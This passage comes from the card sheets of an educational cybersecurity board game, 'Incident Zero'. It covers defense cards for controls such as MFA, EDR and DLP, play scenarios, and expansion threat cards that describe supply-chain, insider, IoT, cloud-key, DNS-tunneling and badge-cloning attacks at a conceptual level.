│ combined with technical controls.   │
└─────────────────────────────────────┘

Card D-03: Windows Update Patching

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ WINDOWS UPDATE PATCHING             │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: WEB EXPLOIT         │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy automated Windows Update     │
│ management across all systems.      │
│ Establish patch deployment timelines│
│ (critical = 48 hours, high = 2      │
│ weeks). Audit compliance with patch │
│ reporting.                          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Closes browser and kernel           │
│ vulnerabilities. Prevents watering  │
│ hole and exploit kit attacks.       │
│ Should be combined with vulnerability│
│ scanning to identify gaps.          │
└─────────────────────────────────────┘

Card D-04: Network Firewall Rules

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ NETWORK FIREWALL RULES              │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy perimeter firewall rules to  │
│ block unauthorized outbound         │
│ protocols. Default-deny for unusual │
│ ports and known malware C2 domains. │
│ Whitelist only necessary business   │
│ traffic.                            │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents early-stage lateral        │
│ movement and C2 beaconing.          │
│ Slows attacker reconnaissance.      │
│ Must be maintained with threat      │
│ intelligence feeds.                 │
└─────────────────────────────────────┘

Card D-05: Log Centralization

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ LOG CENTRALIZATION                  │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy centralized log aggregation  │
│ (syslog, Splunk, ELK). Forward      │
│ Windows Event Logs, firewall logs,  │
│ DNS queries, and proxy logs to      │
│ central SIEM. Configure syslog      │
│ integrity protection.               │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Makes local log tampering difficult.│
│ Provides investigative visibility   │
│ into attacker activities. Foundation│
│ for threat hunting and compliance.  │
└─────────────────────────────────────┘

Card D-06: Basic Antivirus Deployment

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ BASIC ANTIVIRUS DEPLOYMENT          │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy signature-based antivirus    │
│ across all endpoints. Enable        │
│ automatic definition updates        │
│ (daily). Configure real-time file   │
│ and email scanning.                 │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Catches known malware variants.     │
│ Does not detect zero-day or        │
│ polymorphic malware. Useful as part │
│ of defense-in-depth but insufficient│
│ as primary defense.                 │
└─────────────────────────────────────┘

Card D-19: Backup & Disaster Recovery

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ BACKUP & DISASTER RECOVERY          │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement the 3-2-1 backup          │
│ strategy: 3 copies of data, 2       │
│ different storage types, 1 offsite  │
│ copy. Test restore procedures       │
│ quarterly.                          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Enables rapid recovery from         │
│ ransomware. Ensures data            │
│ availability even if primary        │
│ systems are compromised. Critical   │
│ for business continuity.            │
└─────────────────────────────────────┘

Card D-23: IR Program & Runbooks

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ IR PROGRAM & RUNBOOKS               │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Establish an incident response      │
│ program with detailed runbooks for  │
│ common scenarios: malware infection,│
│ data exfiltration, ransomware,      │
│ insider threats, supply chain       │
│ compromise. Include roles,          │
│ responsibilities, and communication │
│ plans.                              │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Enables faster, more coordinated    │
│ response when incidents occur.      │
│ Reduces confusion during high-      │
│ pressure situations. Improves       │
│ incident containment and recovery   │
│ time.                               │
└─────────────────────────────────────┘

ADVANCED DEFENSES (15 Budget Each)

Card D-07: Multi-Factor Authentication (MFA)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ MULTI-FACTOR AUTHENTICATION (MFA)   │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy MFA for all remote access    │
│ (VPN, RDP), email, and admin        │
│ portals. Use authenticator apps or  │
│ hardware tokens (not SMS). Enforce  │
│ MFA on sensitive user accounts.     │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Makes compromised credentials       │
│ useless without the second factor.  │
│ Blocks credential stuffing attacks. │
│ Most effective single security      │
│ measure against account takeover.   │
└─────────────────────────────────────┘

Card D-08: EDR (Endpoint Detection & Response)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ EDR (ENDPOINT DETECTION & RESPONSE) │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy EDR agent on all endpoints.  │
│ Monitor process execution, file     │
│ creation, registry modifications,   │
│ and memory injection attempts.      │
│ Enable behavioral analytics and     │
│ automated response.                 │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects living-off-the-land attacks │
│ (PowerShell, cmd, scheduled tasks). │
│ Enables fast incident response and  │
│ threat hunting. Provides deep       │
│ visibility into attack progression. │
└─────────────────────────────────────┘

Card D-09: Network Segmentation

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ NETWORK SEGMENTATION                │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement VLANs and microsegmentation│
│ to separate user workstations from  │
│ servers. Deploy firewall rules      │
│ between segments. Implement zero-   │
│ trust network access controls.      │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents lateral movement via SMB   │
│ and other internal protocols.       │
│ Limits blast radius of compromise.  │
│ Forces attackers to find alternate  │
│ paths. Combined with MFA, highly    │
│ effective.                          │
└─────────────────────────────────────┘

Card D-10: SIEM Correlation Rules

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ SIEM CORRELATION RULES              │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Create SIEM rules to detect attack  │
│ patterns: failed login spikes,      │
│ privilege escalation attempts,      │
│ unusual process creation, scheduled │
│ task creation, and data exfil       │
│ indicators.                         │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Correlates events across logs to    │
│ detect multi-step attacks. Reduces  │
│ alert fatigue through smart         │
│ aggregation. Enables faster         │
│ investigation and response.         │
└─────────────────────────────────────┘

Card D-11: Data Loss Prevention (DLP)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ DATA LOSS PREVENTION (DLP)          │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL          │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy DLP to monitor outbound data │
│ transfers. Classify sensitive data  │
│ (customer PII, source code, trade   │
│ secrets). Block or alert on         │
│ unauthorized transfers to cloud     │
│ storage, email, USB, or external    │
│ networks.                           │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents SQL database exfiltration  │
│ and bulk data theft. Detects        │
│ unusual data access patterns.       │
│ Enforces data security policies.    │
│ Works best with strong authentication│
│ and encryption.                     │
└─────────────────────────────────────┘

Card D-12: Password Manager & Vault

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PASSWORD MANAGER & VAULT            │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy enterprise password vault    │
│ (CyberArk, HashiCorp Vault). Enforce│
│ strong unique passwords. Implement  │
│ password rotation policies for      │
│ service accounts. Enable audit      │
│ logging for credential access.      │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents credential reuse attacks.  │
│ Makes credential stuffing difficult.│
│ Provides audit trail for compliance │
│ and incident investigation.         │
└─────────────────────────────────────┘

Card D-18: Intrusion Prevention System (IPS)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ INTRUSION PREVENTION SYSTEM (IPS)   │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: WEB EXPLOIT         │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy network-based IPS with       │
│ exploit signatures. Monitor for     │
│ known CVE exploitation patterns.    │
│ Configure WAF (Web Application      │
│ Firewall) rules for SQL injection,  │
│ XSS, and other OWASP Top 10 attacks.│
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Blocks exploitation attempts in     │
│ transit. Prevents watering hole and │
│ web exploit attacks. Most effective │
│ when combined with patching.        │
└─────────────────────────────────────┘

Card D-24: Threat Intelligence Integration

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ THREAT INTELLIGENCE INTEGRATION     │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasures: NETWORK,           │
│                  DATA EXFIL         │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Subscribe to threat intelligence    │
│ feeds (MISP, VirusTotal, AlienVault │
│ OTX). Integrate IOCs (Indicators of │
│ Compromise) into firewall, SIEM,    │
│ and proxy. Participate in           │
│ information sharing communities.    │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Enables faster detection of known   │
│ malicious IPs and domains.          │
│ Identifies emerging threats         │
│ targeting your industry. Reduces    │
│ detection time from days to minutes.│
└─────────────────────────────────────┘

ELITE DEFENSES (25 Budget Each)

Card D-13: Threat Hunting Program

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ THREAT HUNTING PROGRAM              │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Establish proactive threat hunting  │
│ using MITRE ATT&CK framework.       │
│ Hunt for living-off-the-land        │
│ techniques, anomalous processes,    │
│ suspicious registry changes, and    │
│ memory injection. Use automated     │
│ tools (OSQuery, Velociraptor).      │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Finds advanced attacks that bypass  │
│ signature-based detection. Detects  │
│ LSASS dumping, scheduled task       │
│ persistence, and registry backdoors.│
│ Reduces dwell time significantly.   │
└─────────────────────────────────────┘

Card D-14: Memory Forensics

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ MEMORY FORENSICS                    │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy memory capture and analysis  │
│ (Volatility, Memoryze). Create      │
│ memory images of suspicious systems.│
│ Analyze for credential dumping,     │
│ injected code, and rootkits. Extract│
│ evidence for incident response.     │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects Mimikatz attacks and        │
│ credential harvesting. Reveals      │
│ attacker activities hidden from     │
│ disk forensics. Critical for        │
│ identifying advanced persistence    │
│ mechanisms.                         │
└─────────────────────────────────────┘

Card D-15: Deception Technology (Honeypots)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ DECEPTION TECHNOLOGY (HONEYPOTS)    │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy decoy systems (fake file     │
│ servers, databases, credentials)    │
│ to detect lateral movement. Create  │
│ canary tokens that alert when       │
│ accessed. Deploy honeypots for web  │
│ exploit detection.                  │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Any access to honeypots indicates   │
│ active compromise. Detects lateral  │
│ movement with zero false positives. │
│ Slows attacker progress and forces  │
│ reconnaissance, increasing detection│
│ time.                               │
└─────────────────────────────────────┘

Card D-16: Credential Guard & Secure Boot

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CREDENTIAL GUARD & SECURE BOOT      │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Enable Windows Credential Guard to  │
│ isolate LSASS in virtualized        │
│ container. Implement UEFI Secure    │
│ Boot to prevent bootkit attacks.    │
│ Enable TPM attestation for device   │
│ integrity validation.               │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Makes Mimikatz credential dumping   │
│ ineffective. Prevents bootloader    │
│ manipulation. Ensures firmware      │
│ integrity. Blocks entire classes of │
│ attacks targeting early boot stage. │
└─────────────────────────────────────┘

Card D-17: Advanced Malware Sandbox

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ ADVANCED MALWARE SANDBOX            │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy advanced sandboxing solution │
│ (Cuckoo, Detonate, hybrid-analysis).│
│ Analyze suspicious files/URLs in    │
│ isolated environments. Generate     │
│ behavioral indicators and YARA      │
│ rules. Share IOCs with threat intel.│
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects zero-day malware and unknown│
│ exploits. Analyzes evasion tactics. │
│ Generates detection rules for SIEM. │
│ Prevents spread of novel malware.   │
└─────────────────────────────────────┘

Card D-20: Zero Trust Access Control

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ ZERO TRUST ACCESS CONTROL           │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement zero-trust architecture:  │
│ verify every access request         │
│ regardless of source. Deploy device │
│ identity, user identity, and        │
│ behavior analytics. Implement       │
│ conditional access policies.        │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Eliminates implicit trust based on  │
│ network location. Even compromised  │
│ devices cannot access sensitive     │
│ resources without proper            │
│ authentication and behavior         │
│ validation.                         │
└─────────────────────────────────────┘

Card D-21: Container Security & Orchestration

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CONTAINER SECURITY & ORCHESTRATION  │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy container runtime security   │
│ (Falco, Sysdig). Implement image    │
│ scanning for vulnerabilities. Use   │
│ policy enforcement engines (OPA/    │
│ Gatekeeper). Implement network      │
│ policies for container              │
│ segmentation.                       │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects container escape attempts.  │
│ Prevents vulnerable images from     │
│ running. Limits lateral movement    │
│ within containerized environments.  │
│ Critical for modern cloud           │
│ applications.                       │
└─────────────────────────────────────┘

Card D-22: Security Information & Event Management (SIEM)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ SECURITY INFO & EVENT MGMT (SIEM)   │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy enterprise SIEM (Splunk,     │
│ ELK, QRadar). Centralize logs from  │
│ all sources. Implement automated    │
│ correlation rules, threat           │
│ intelligence integration, and       │
│ incident response workflows.        │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Provides centralized visibility     │
│ into all security events. Enables   │
│ rapid threat detection and          │
│ investigation. Foundation for a     │
│ mature incident response program.   │
└─────────────────────────────────────┘

Sample Printable Card Layouts

Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Cut along dotted lines
  3. Optional: Laminate or use sleeves for durability
  4. For color printing: Use the color-coded vectors (red for MALWARE, blue for CREDENTIAL ABUSE, etc.)

Recommended Colors for Vectors


Card Deck Summary

Threat Cards (12 Total)

Defense Cards (24 Total)

Distribution by Countermeasure (v2.2): - SOCIAL ENGINEERING: 2 defenses (D-01, D-02) - WEB EXPLOIT: 2 defenses (D-03, D-18) - CREDENTIAL ABUSE: 4 defenses (D-07, D-12, D-16, D-20) - MALWARE: 8 defenses (D-05, D-06, D-08, D-13, D-14, D-17, D-19, D-21) - NETWORK: 7 defenses (D-04, D-09, D-10, D-15, D-22, D-23, D-24) - DATA EXFIL: 2 defenses (D-11, D-24)

Note: 24 cards total. D-24 is dual-tagged (NETWORK + DATA EXFIL) and appears in both rows, so the vector rows sum to 25 tags across 24 cards.


Suggested Play Scenarios

Scenario 1: Startup Security Breach (3-card chain - Beginner)

  1. Phishing Campaign → Deploy Email Authentication or User Training
  2. Mimikatz Credential Dumping → Deploy MFA or Credential Guard
  3. Data Exfiltration via Browser Extension → Deploy DLP or Threat Hunting

Scenario 2: SMB Lateral Movement (4-card chain - Intermediate)

  1. Compromised Credentials → Deploy MFA
  2. Lateral Movement via SMB → Deploy Network Segmentation
  3. Privilege Escalation → Deploy EDR or Threat Hunting
  4. Beaconing to C2 → Deploy Firewall Rules or IPS

Scenario 3: Advanced Ransomware Campaign (5-card chain - Expert)

  1. Watering Hole Attack → Deploy Patching or IPS
  2. Privilege Escalation via Kernel Exploit → Deploy EDR
  3. Scheduled Task Persistence → Deploy Memory Forensics
  4. Mimikatz Credential Dumping → Deploy Credential Guard
  5. Ransomware Deployment → Deploy DLP and Deception Technology

Expansion Decks

The ideas below have been built out as printable expansion cards:

Expansion Threat Cards (T-13 to T-20)

Supply chain attacks, insider threats, IoT device compromise, cloud API abuse, DNS tunneling, and physical security bypass — see ../expansion-deck/advanced-threats.md.

Expansion Defense Cards (D-25 to D-43)

Application whitelisting, behavioral analytics, container security, cloud security posture management, response playbooks, and backup/DR variants — see ../expansion-deck/advanced-defenses.md.


Sample card sheets for Incident Zero board game For complete game rules, see docs/rules/core-rules.md and docs/rules/module-incident-response.md

cards/incident-response/expansion-deck/advanced-threats.md

Incident Zero: Expansion Threat Cards

Advanced Attack Scenarios & Additional Threats

This document provides additional Threat Cards for expanding Incident Zero gameplay beyond the base 12-card deck. These cards introduce more sophisticated attack vectors and modern threat landscape scenarios.


ADDITIONAL THREAT CARDS (8 Cards)

Supply Chain Attack Threats

Card T-13: Compromised Software Vendor Update

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ COMPROMISED SOFTWARE VENDOR UPDATE  │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your monitoring systems detect     │
│ unusual outbound connections from   │
│ a recently deployed software update │
│ to an IP address not associated     │
│ with the vendor. The update was     │
│ digitally signed but verification   │
│ shows the signature was backdated.  │
│ Hundreds of organizations received  │
│ the same malicious update."         │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Supply chain compromises affect     │
│ entire industries simultaneously.    │
│ Organizations trust vendor updates  │
│ and often deploy them automatically │
│ without deep inspection. The        │
│ attacker gains access to thousands  │
│ of targets at once. Real-world      │
│ example: SolarWinds, 3CX.           │
│                                     │
│ DETECTION DIFFICULTY: High          │
│ The malware appears legitimate due  │
│ to trusted vendor origin.           │
└─────────────────────────────────────┘

Card T-14: Malicious Third-Party Library Injection

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ MALICIOUS THIRD-PARTY LIBRARY       │
│ INJECTION                           │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your dependency scanning tool      │
│ alerts on a typosquatted NPM        │
│ package (npm package manager) that  │
│ was installed in your build         │
│ pipeline. The malicious package has │
│ the same name as a popular logging  │
│ library but with a slight misspell. │
│ It has been downloaded 50k times.   │
│ Your build logs show it was         │
│ installed 6 days ago."              │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Developers rely on open-source      │
│ packages from package managers      │
│ (npm, PyPI, Maven). Attackers       │
│ upload malicious packages with      │
│ names similar to popular libraries  │
│ (typosquatting). Once downloaded,   │
│ the malicious code runs during      │
│ build/deployment. This affects      │
│ every application built from that   │
│ point forward.                      │
│                                     │
│ DETECTION DIFFICULTY: High          │
│ Requires dependency scanning and    │
│ behavior analysis of build processes.│
└─────────────────────────────────────┘

Insider Threat Cards

Card T-15: Malicious Insider Data Theft

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ MALICIOUS INSIDER DATA THEFT        │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  DATA EXFIL                 │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your DLP system flags a large      │
│ volume of sensitive data being      │
│ copied by an IT operations          │
│ employee during off-hours. Their    │
│ user account accessed databases     │
│ they don't normally interact with.  │
│ The data was copied to a removable  │
│ USB drive connected to a shared     │
│ workstation. Security badge logs    │
│ show they entered the building at   │
│ 2 AM when the office was empty."    │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Insiders have legitimate access and │
│ often bypass security controls.     │
│ Their activities may not trigger    │
│ alerts because their permissions    │
│ are valid. Detection requires:      │
│ - Behavioral analysis (unusual      │
│  times/volumes)                     │
│ - Physical security controls        │
│ - DLP and USB device control        │
│ - Privileged access management      │
│ Insiders cause 30-40% of data      │
│ breaches in many industries.        │
│                                     │
│ DETECTION DIFFICULTY: Very High     │
│ Insider actions often look normal   │
│ to automated systems.               │
└─────────────────────────────────────┘

Card T-16: Disgruntled Employee Sabotage

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ DISGRUNTLED EMPLOYEE SABOTAGE       │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "A recently terminated database     │
│ administrator appears to have       │
│ retained remote access using a      │
│ dormant service account they        │
│ created months ago. Logs show       │
│ connection attempts from their      │
│ home IP address. They've been       │
│ modifying stored procedures and     │
│ adding logic bombs set to trigger   │
│ in 30 days. Your team notices       │
│ their employee laptop is still      │
│ configured with VPN certificates."  │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Disgruntled employees often have    │
│ privileged access and deep system   │
│ knowledge. They may have created    │
│ backdoors before termination.       │
│ Offboarding failures (not revoking  │
│ certs, not disabling accounts) are  │
│ common. Defense requires:           │
│ - Complete offboarding procedures   │
│ - Privileged access review          │
│ - Anomalous activity detection      │
│ - Behavior analysis for terminated  │
│  employees                          │
│                                     │
│ DETECTION DIFFICULTY: High          │
│ Requires correlation of access      │
│ patterns and employee status changes.│
└─────────────────────────────────────┘

IoT Device Compromise

Card T-17: Compromised IoT Device as Pivot Point

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ COMPROMISED IOT DEVICE AS PIVOT     │
│ POINT                               │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  NETWORK                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your network monitoring detects    │
│ unusual traffic from an IoT device  │
│ (surveillance camera) in the        │
│ building. The device is communicating│
│ with a command server overseas and  │
│ tunneling internal network traffic. │
│ Your asset inventory shows this     │
│ camera was never formally added to  │
│ any security program. It's running  │
│ firmware from 2019 with known       │
│ vulnerabilities."                   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ IoT devices are often neglected in  │
│ security programs (cameras, printers,│
│ thermostats, building automation).  │
│ They run outdated firmware and have │
│ weak or default credentials. Once   │
│ compromised, they provide network   │
│ access and can pivot to critical    │
│ systems. Many organizations don't   │
│ inventory or monitor IoT devices.   │
│                                     │
│ DETECTION DIFFICULTY: Medium        │
│ Requires network monitoring and     │
│ device inventory practices.         │
└─────────────────────────────────────┘

Cloud API Abuse

Card T-18: Cloud API Token Theft & Abuse

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ CLOUD API TOKEN THEFT & ABUSE       │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  CREDENTIAL ABUSE           │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your AWS CloudTrail logs show API  │
│ calls from unusual IP addresses     │
│ using API keys belonging to a       │
│ developer who left the company 6    │
│ months ago. The calls are creating  │
│ new IAM users, accessing S3 buckets │
│ with customer data, and launching   │
│ EC2 instances in regions where you  │
│ don't normally operate. The API key │
│ was embedded in old GitHub          │
│ repository code."                   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Cloud API tokens/keys are often     │
│ exposed in code repositories or     │
│ configuration files. Once exposed,  │
│ they provide direct access to cloud │
│ resources. Attackers can spin up    │
│ resources, steal data, or deploy    │
│ cryptominers. Many organizations    │
│ fail to rotate or revoke old API    │
│ keys. Detection requires:           │
│ - API audit logging                 │
│ - Anomalous API pattern detection   │
│ - Key rotation policies             │
│ - Secrets scanning in repos         │
│                                     │
│ DETECTION DIFFICULTY: Medium-High   │
│ Requires cloud monitoring and       │
│ secrets management practices.       │
└─────────────────────────────────────┘

DNS Tunneling for Data Exfiltration

Card T-19: DNS Tunneling Data Exfiltration

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ DNS TUNNELING DATA EXFILTRATION     │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  DATA EXFIL                 │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your DNS query logs show massive   │
│ volume of unusual subdomains being  │
│ queried through an external DNS     │
│ resolver. The subdomain names look  │
│ like Base64-encoded data. Queries   │
│ are happening in steady intervals.  │
│ Query timestamps align with your    │
│ database being accessed. Your DLP   │
│ didn't flag anything because DNS is │
│ typically trusted."                 │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ DNS tunneling encodes data in DNS   │
│ queries to bypass firewalls and DLP │
│ systems. Organizations often allow  │
│ DNS traffic without inspection. DNS │
│ queries are typically high-volume   │
│ and hard to distinguish from normal │
│ activity. Attackers can exfil small │
│ amounts of data over weeks.         │
│ Defense requires:                   │
│ - DNS query content analysis        │
│ - Anomalous query pattern detection │
│ - DNS rate limiting                 │
│ - External DNS access restrictions  │
│                                     │
│ DETECTION DIFFICULTY: Very High     │
│ Requires specialized DNS monitoring │
│ tools and baseline analysis.        │
└─────────────────────────────────────┘

Physical Security Bypass

Card T-20: Physical Access + Badge Cloning Attack

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ PHYSICAL ACCESS + BADGE CLONING     │
│ ATTACK                              │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  CREDENTIAL ABUSE           │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your security team discovers that  │
│ an RFID badge belonging to a        │
│ manager was cloned using a portable │
│ reader. The cloned badge was used   │
│ to gain access to your secure data  │
│ center after-hours. Badge access    │
│ logs are timestamped, but the       │
│ person's schedule shows they weren't│
│ in the office that evening. Your    │
│ server room CCTV captured footage   │
│ of an unknown individual installing │
│ a wireless device in the network    │
│ rack."                              │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Physical security is often          │
│ overlooked in cybersecurity         │
│ programs. RFID badges can be cloned │
│ with inexpensive readers. Once      │
│ inside the data center, attackers   │
│ can install rogue network devices,  │
│ steal hardware, or gain console     │
│ access to servers. Defense requires:│
│ - Encrypted badge technology        │
│ - Multi-factor access (biometric)   │
│ - CCTV monitoring                   │
│ - Environmental controls            │
│ - Equipment inventory tracking      │
│ - Badge deactivation on exit        │
│                                     │
│ DETECTION DIFFICULTY: High          │
│ Requires integration of physical    │
│ and cyber security monitoring.      │
└─────────────────────────────────────┘

Integrating Expansion Threats into Your Game

Attack Vector Summary (Expansion Cards)

Suggested Scenario Combinations

Scenario 4: "Supply Chain Nightmare" (5-card chain - Expert)

Teaches: Third-party risk management, vendor security assessment, incident response at scale 1. Compromised Software Vendor Update (Initial Compromise) → MALWARE 2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK 3. Scheduled Task Persistence (Persistence) → MALWARE 4. Beaconing to C2 Server (C2 & Exfil) → NETWORK 5. SQL Database Exfiltration (C2 & Exfil) → DATA EXFIL

